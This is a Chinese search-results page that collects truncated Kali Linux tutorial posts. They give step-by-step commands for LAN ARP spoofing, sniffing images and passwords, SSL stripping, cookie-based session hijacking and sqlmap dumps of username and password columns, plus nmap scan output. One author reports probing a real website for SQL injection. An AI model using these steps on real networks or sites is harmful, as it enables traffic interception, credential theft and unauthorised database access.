精华内容
下载资源
问答
  • kali 局域网嗅探

    千次阅读 2018-10-02 21:09:00
    1、局域网图片嗅探 工具 arpspoof arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描... linux中 扫描局域网在线的主机 fping -asg 192.168.1.0/24 ...

    1、局域网图片嗅探

         工具  arpspoof

          arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描工具  Advanced ip Scanner

            linux中 扫描局域网在线的主机 fping -asg 192.168.1.0/24 

                        
            欺骗的同时不能是对方断网,使用流量转发  echo 1 >/proc/sys/net/ipv4/ip_forward   

            检查是否成功执行     cat  proc/sys/sys/net/ipv4/ip_forward          
                         获取本机网卡的图片   driftnet -i eth0

    2、密码嗅探 <http>

           先使用欺骗命令 arpspoof

             ettercap -Tq - i eth0

       

    3、ssh远程连接操作  链接kali  shell模式注销

         ctrl +Alt +F1   切换到 命令行模式

          使用命令   /etc/init.d/ssh  start

          使用Xshell 链接kali ip

    4、抓包https流量

         首先编辑    vim /etc/ettercap/etter.conf   修改  ****linux **  取消 #

        开启 sslstrip -a -f -k

         开启欺骗  arpspoof  同时转发流量 

       在https 网址上进行登陆 抓取流量

     5、会话劫持登陆已经被别人登陆的网站

        快速添加之前使用的命令  ! + 部分命令  就会补全

        先使用arpspoof 欺骗 同时流量转发

        使用 wireshark 流量抓包工具

         使用 ferret 重新生成抓包的工具

         ferret  -r  j加上 抓取的流量包  会生成一个 txt文件

        使用 hamster  -h打开一个浏览器        -----》 设置代理和端口   

        或者不适用欺骗,直接使用 ferret -i eth0  然后使用 hamster  浏览网页  

        另外基于界面的软件 cookieCadger

    6、sqlmap 对asp网站的检测

          sqlmap -u "www.baidu.com.id=2" 

           sqlmap -u "www.baidu.com.id=2"   --tables

           sqlmap -u "www.baidu.com.id=2"     --columns -T  "user"

             sqlmap -u "www.baidu.com.id=2"  --dump  -C "username ,password" -T "user"

        cookie使用     sqlmap -u “  www.baidu.com.php.id=2”   --cookie "id=23" --level=2

         

    7、sqlmap 对php网站的检测

           sqlmap -u “  www.baidu.com.php.id=2”  --is-dba   检测是否是dba 形式  (可以将文件写入目录)

            sqlmap -u “  www.baidu.com.php.id=2”  --dbs   (列出所有的数据库)

          sqlmap -u “  www.baidu.com.php.id=2”   --current-db     (猜测当前的数据库)

            sqlmap -u “  www.baidu.com.php.id=2”  --tables -D "admin"   (根据admin数据库猜测表名)

             sqlmap -u “  www.baidu.com.php.id=2”   --columns -T "pss"  -D "admin"

             sqlmap -u “  www.baidu.com.php.id=2”  --dump  -C "username,password " -T "pss"  -D "admin"

    8、实例检测

       下面是我检测的一个网上的PHP的网站 存在SQL注入的漏洞

    9、Metasploit

         msfconsole

         这一节我之前的微博已经写过很多,不过还没哟整理,想着抽空整理一遍

       

        

    10、流量分析工具 nload

            附: 卸载之前暗转的软件 apt-get remove 

                 修复没有成功安装的软件   apt --fix-broken install

    11、metasploit

        使用Metasploit 辅助模块 wmap进行扫描(对网站进行集中的扫描)

        使用Sqlmap辅助模块进行扫描:

     

          

       

       

     

     

     

        

        

         

     

       

     

    转载于:https://www.cnblogs.com/xinxianquan/p/9735720.html

    展开全文
  • Kali 使用nmap命令进行局域网扫描

    千次阅读 2020-09-22 15:37:04
    1.内网IP地址扫描 sudo -i namp -sP 192.168.1.0/24 (P一定要大写,192.168.1.0是自己内网的...3.隐藏扫描端口(不容易被主机发现) nmap -sS 192.168.1.102 4.UDP端口扫描 nmap -sU 192.168.1.109 5.操作系统识别 nma

    1.内网IP地址扫描

    sudo -i
    namp -sP 192.168.1.0/24 (P一定要大写,192.168.1.0是自己内网的网络号加子网号,和为0的主机号)
    

    在这里插入图片描述
    2端口扫描

    sudo -i
    namp -sT 192.168.1.101 (T一定要大写,192.168.1.101是自己要扫描的设备的内网ip地址)
    

    在这里插入图片描述
    3.隐藏扫描端口(不容易被主机发现)

    nmap -sS 192.168.1.102
    

    在这里插入图片描述
    4.UDP端口扫描

    nmap -sU 192.168.1.109 
    

    5.操作系统识别

    nmap -sS -O  192.168.1.109
    
    展开全文
  • Kali Linux 使用nmap进行局域网扫描

    万次阅读 2017-07-21 11:52:58
    ping扫描扫描192.168.0.0/24网段上有哪些主机是存活的;   [root@laolinux ~]# nmap -sP 192.168.0.0/24 Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-25 06:59 CST Host laolinux ...
    ping扫描:扫描192.168.0.0/24网段上有哪些主机是存活的;
    
     
    [root@laolinux ~]# nmap -sP 192.168.0.0/24
    Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-25 06:59 CST
    Host laolinux (192.168.0.3) appears to be up.
    Host 192.168.0.20 appears to be up.
    MAC Address: 00:1E:4F:CD:C6:0E (Unknown)
    Host 192.168.0.108 appears to be up.
    MAC Address: 00:E3:74:27:05:B7 (Unknown)
    Host 192.168.0.109 appears to be up.
    MAC Address: 00:E0:E4:A6:14:6F (Fanuc Robotics North America)
    Host 192.168.0.111 appears to be up.
    MAC Address: 00:E0:E4:A6:1C:91 (Fanuc Robotics North America)
    Host 192.168.0.114 appears to be up.
    MAC Address: 00:11:1A:35:38:65 (Motorola BCS)
    Host 192.168.0.118 appears to be up.
    MAC Address: 00:E0:2A:51:AC:5B (Tandberg Television AS)
    Host 192.168.0.119 appears to be up.
    MAC Address: 00:EA:E5:C1:21:D6 (Unknown)
    Host 192.168.0.124 appears to be up.
    MAC Address: 00:E0:4C:39:05:81 (Realtek Semiconductor)
    Host 192.168.0.127 appears to be up.
    MAC Address: 00:11:1A:35:38:62 (Motorola BCS)
    Host 192.168.0.128 appears to be up.
    MAC Address: 00:E0:E4:A6:1C:96 (Fanuc Robotics North America)
    Host 192.168.0.134 appears to be up.
    MAC Address: 00:E0:2A:51:AC:5F (Tandberg Television AS)
    Host 192.168.0.135 appears to be up.
    MAC Address: 00:11:1A:35:38:60 (Motorola BCS)
    Host 192.168.0.137 appears to be up.
    MAC Address: 00:1F:06:D6:3E:BA (Unknown)
    Host 192.168.0.139 appears to be up.
    MAC Address: 00:E0:E4:A6:1C:92 (Fanuc Robotics North America)
    Host 192.168.0.140 appears to be up.
    MAC Address: 00:1F:1A:39:1B:8D (Unknown)
    Host 192.168.0.155 appears to be up.
    MAC Address: 00:1C:23:4C:DB:A0 (Unknown)
    Host 192.168.0.211 appears to be up.
    MAC Address: 00:1D:72:98:A2:8C (Unknown)
    Host 192.168.0.220 appears to be up.
    MAC Address: 00:40:45:20:8C:93 (Twinhead)
    Host 192.168.0.221 appears to be up.
    MAC Address: 00:09:6B:50:71:26 (IBM)
    Nmap finished: 256 IP addresses (20 hosts up) scanned in 3.818 seconds
     
    2、端口扫描:扫描192.168.0.3这台主机开放了哪些端口;
     
    [root@laolinux ~]# nmap -sT 192.168.0.3
    Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-25 07:02 CST
    Interesting ports on laolinux (192.168.0.3):
    Not shown: 1667 closed ports
    PORT      STATE SERVICE
    21/tcp    open  ftp
    22/tcp    open  ssh
    25/tcp    open  smtp
    53/tcp    open  domain
    80/tcp    open  http
    110/tcp   open  pop3
    111/tcp   open  rpcbind
    143/tcp   open  imap
    964/tcp   open  unknown
    993/tcp   open  imaps
    995/tcp   open  pop3s
    3306/tcp  open  mysql
    10000/tcp open  snet-sensor-mgmt
    Nmap finished: 1 IP address (1 host up) scanned in 4.755 seconds
    3、隐藏扫描,只在目标主机上留下很少的日志信息:隐藏扫描192.168.0.220
     
    [root@laolinux ~]# nmap -sS 192.168.0.127
    Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-25 07:08 CST
    Interesting ports on 192.168.0.127:
    Not shown: 1675 closed ports
    PORT    STATE SERVICE
    21/tcp  open  ftp
    135/tcp open  msrpc
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    912/tcp open  unknown
    MAC Address: 00:11:1A:35:38:62 (Motorola BCS)
    Nmap finished: 1 IP address (1 host up) scanned in 3.121 seconds
    4、UDP端口扫描:扫描192.168.0.127开放了哪些UDP端口;
     
    [root@laolinux ~]# nmap -sU 192.168.0.127
    Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-25 07:08 CST
    Interesting ports on 192.168.0.127:
    Not shown: 1480 closed ports
    PORT     STATE         SERVICE
    123/udp  open|filtered ntp
    137/udp  open|filtered netbios-ns
    138/udp  open|filtered netbios-dgm
    445/udp  open|filtered microsoft-ds
    500/udp  open|filtered isakmp
    1900/udp open|filtered UPnP
    4500/udp open|filtered sae-urn
    MAC Address: 00:11:1A:35:38:62 (Motorola BCS)
    Nmap finished: 1 IP address (1 host up) scanned in 2.947 seconds
    5、操作系统识别:
     
    [root@laolinux ~]# nmap -sS -O  192.168.0.127
    Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-25 07:09 CST
    Interesting ports on 192.168.0.127:
    Not shown: 1675 closed ports
    PORT    STATE SERVICE
    21/tcp  open  ftp
    135/tcp open  msrpc
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    912/tcp open  unknown
    MAC Address: 00:11:1A:35:38:62 (Motorola BCS)
    Device type: general purpose
    Running: Microsoft Windows 2003/.NET|NT/2K/XP
    OS details: Microsoft Windows 2003 Server or XP SP2
    Nmap finished: 1 IP address (1 host up) scanned in 5.687 seconds
    ****************************************************
    **    by :     laolinux
    **    my blog: http://laolinux.cublog.cn
    ****************************************************
    目标来源--------------------》博客

    http://www.cnblogs.com/zhangjianghua/p/6639291.html


    展开全文
  • 1、 Kali中安装arpspoof工具 安装命令:apt install dsniff ssldump 安装完成后输入arpspoof回车,...发现网络上主机后开始arp欺骗,例如扫描主机192.168.1.3 3、 Arp欺骗命令:arpspoof -i eth0 –t 192.168.1....

    1、 Kali中安装arpspoof工具
    安装命令:apt install dsniff ssldump
    在这里插入图片描述
    安装完成后输入arpspoof回车,显示软件版本,此处安装2.4版本
    2、 Nmap扫描网络主机:nmap –sP 192.168.1.*
    发现网络上主机后开始arp欺骗,例如扫描到主机192.168.1.3
    3、 Arp欺骗命令:arpspoof -i eth0 –t 192.168.1.3 192.168.1.1
    -i:网卡选择
    -t:target,目标主机地址
    192.168.1.1:网关地址
    4、 运行后则192.168.1.3主机无法上网
    运行前后分别观察192.168.1.3主机arp的动态地址,发现网关地址192.168.1.1对应的MAC地址发生了改变,如下图
    在这里插入图片描述
    Arpspoof原理:arpspoof期间,kali虚拟机周期在对外发出自身IP地址为192.168.1.1的arp响应数据包,以蒙骗主机“我才是路由”,使得主机更新动态路由表,之后均将数据包发送至该MAC地址设备。

    展开全文
  • python—项目5-TCP扫描器与多线程TCP扫描器,单一主机的各种端口,并返回banner信息一、TCP扫描器单线程TCP全连接扫描、抓取应用的Banner1、环境与源码 root@kali:~# cd /root/python/anquangongji/ root@kali:~/...
  • 好久没有写过关于工具的博客了,今天介绍的是EternalBlue漏洞扫描工具,支持扫描单个主机和一整个ip段 废话不多说,安装使用体验一下 使用 首先打开kali虚拟机,当然最好准备一台新安装的windows7虚拟机,window7要...
  • 使用kali局域网主机进行扫描时候,arping命令只能挨个挨个ip的扫描,下面写一个简单的脚本实现批量扫描root@kal:~/scan# vim arping.sh #! bin/bash if [ $# -ne 1 ];then echo "Tips Example: ./arping 10.10.10...
  • 网络安全实验3前言Kali 常用指令工具教程ettercap 基本使用Ettercap 扫描局域网主机Ettercap 扫描局域网主机Ettercap 伪造网关欺骗进行 ARP 欺骗口令破解John the ripper 破解 linux 密码【成功】l0phtcrack7 破解 ...
  • 主机端口扫描

    2021-04-19 17:55:26
    【实验要求】 任务一:namp安装和扫描基础 任务二:选择和排除扫描目标 任务三:扫描发现存活的目标 任务四:识别目标操作系统 ...(2)正常运行的Windows或Kali Linux下的Nmap及真是的局域网环境; 2
  • Orserg Team 官方文档-存活主机扫描 基于Netbios协议发现内网存活主机 你好安全人员!我是Orserg,一个高性能可开放托管组织,专针对初学安全人员提供最为简单并且完全免费的文档资料。很高兴认识你并且能让你从中...
  • 主机发现之二层发现 1、 OSI分层介绍 开放式系统互联 2、 二层主机发现优缺点 含义:利用OSI中链路层中的协议进行主机发现,一般使用ARP协议 优点:(局域网中通信使用ARP...缺点是无法进行多个主机同时进行扫描 4...
  • kali之nmap

    2019-06-14 23:45:00
    nmap简介 Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。可以扫描主机、端口、并且识别端口所对应的协议,以及猜测操作系统 ...扫描局域网内的机器 #仅扫描主机 nmap -sP 1...
  • kali入侵win7

    2020-11-23 12:17:31
    title: kali入侵win7 tags: 教程 author: caijinbo date: 2019-11-19 前提说明 1.在同个局域网内 2.准备纯净系统的win7系统...第一步: 扫描局域网内存活的主机: nmap -sP 192.168.1.0/24 (扫描较快) 也可以直接...
  • ARP断网攻击原理ARP断网攻击基于APR协议的缺陷,通过ARP欺骗来实现以本地网卡...实战演示目标获取使用fping指令扫描局域网内存活的主机目标确定攻击机: Kali 2018 192.168.11.144目标主机:Ubuntu 16.04 192.168....
  • Kali Linux初阶内网渗透教程ARP欺骗开始实验一、将Kali Linux桥接至局域网二、扫描局域网主机三、进行ARP欺骗四、如何防御ARP攻击 更新时间:2021年1月29日 本教程仅作学习,禁止使用教程内的任何指令对非个人...
  • Ettercap实现局域网dns劫持

    千次阅读 2018-08-10 08:55:43
    2.用到的软件:kali中的Ettercap,一个集成工具,里面包括了局域网主机扫描,arp欺骗,DNS劫持等功能; 3.受害PC:自己的虚拟机中的系统centos。 原理 DNS,全称为域名解析协议,是一种将域名...
  • 局域网安全之ARP攻击

    千次阅读 2021-02-11 00:03:39
    局域网安全之ARP攻击 参考文章: ARP原理 ARP原理和ARP攻击 实验环境 攻击方:kali 192.168.31.250 受害方:win10 192.168.31.212 准备 主机互ping ...kali ping win10 ...ping扫描整个网段的主机 发现
  • kali linux中使用ferret进行cookies劫持攻击 首先将kali linux的网卡模式设置为“仅主机...使用nmap或者zenmap扫描局域网内的主机,确定攻击目标 使用arpspoof命令冒充网关 arpspoof -i eth0 -t 网关 目标主机 ...
  • 文章目录使用 msf 渗透攻击 win7 主机并远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该网段 判断目标主机二、通过Nessus 扫描该主机...
  • kali渗透windowsXP过程

    2019-09-25 20:53:12
    对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图 更多我之前做...
  • KaLi Linux中文指南

    2017-10-08 16:52:30
    Kali Linux预装了许多渗透测试软件,包括nmap (端口扫描器)、Wireshark (数据包分析器)、John the Ripper (密码破解器),以及Aircrack-ng (一应用于对无线局域网进行渗透测试的软件)用户可通过硬盘、live CD或live ...
  • Kali Linux信息收集

    2020-06-19 20:17:49
    局域网扫描 arping arping 192.168.43.1 arping主机192.168.43.1 nmap nmap -sn 192.168.43.0/24 扫描192.168.43.0/24段地址的存活主机 netdiscover netdiscover -i eth0 -r 192.168.43.0/24 -i:设定网卡 -r:...
  • ##扫描局域网中存活的主机 nmap -sS 192.168.1.* ##对网关地址进行染毒 arpspoof -t 192.168.1.56 -r 192.168.1.1 此时目标主机192.168.1.56出现假的断网 ##开启路由转发 将目标主机的流量流进攻击机 echo 1 > /...
  • Kali系列之ettercap欺骗

    2018-03-20 16:24:00
    ettercap在局域网中使用欺骗, 捕获对象浏览器中的图片。 环境 攻击方:kali linux, ip:192.168.137.129 目标方ip:192.168.137.130 路由器:192.168.137.1 ...扫描活动主机 扫描中... 列出ho...
  • 对DC-2靶机进行渗透测试 1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用wpscan进一步扫描 ...7.root权限提升 1.搭建渗透平台 ...使用nmap扫描局域网中的主机 Bash shell命令 nmap -sn 192.168.11.0/24 Bash sh...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 局域网自然就是局部地区形成的一个区域网络,其特点就是分布地区范围有限,可大可小,大到一栋...
  • 在前面我都演示的是在Kali下用命令行的形式将在目标主机上操作的用户的信息捕获的过程,那么接下来我将演示在Kali...接下来进行在同一局域网内的主机扫描: 可以看出扫描出的主机还不少: 添加目标主机: ...

空空如也

空空如也

1 2 3 4
收藏数 78
精华内容 31
关键字:

kali扫描局域网主机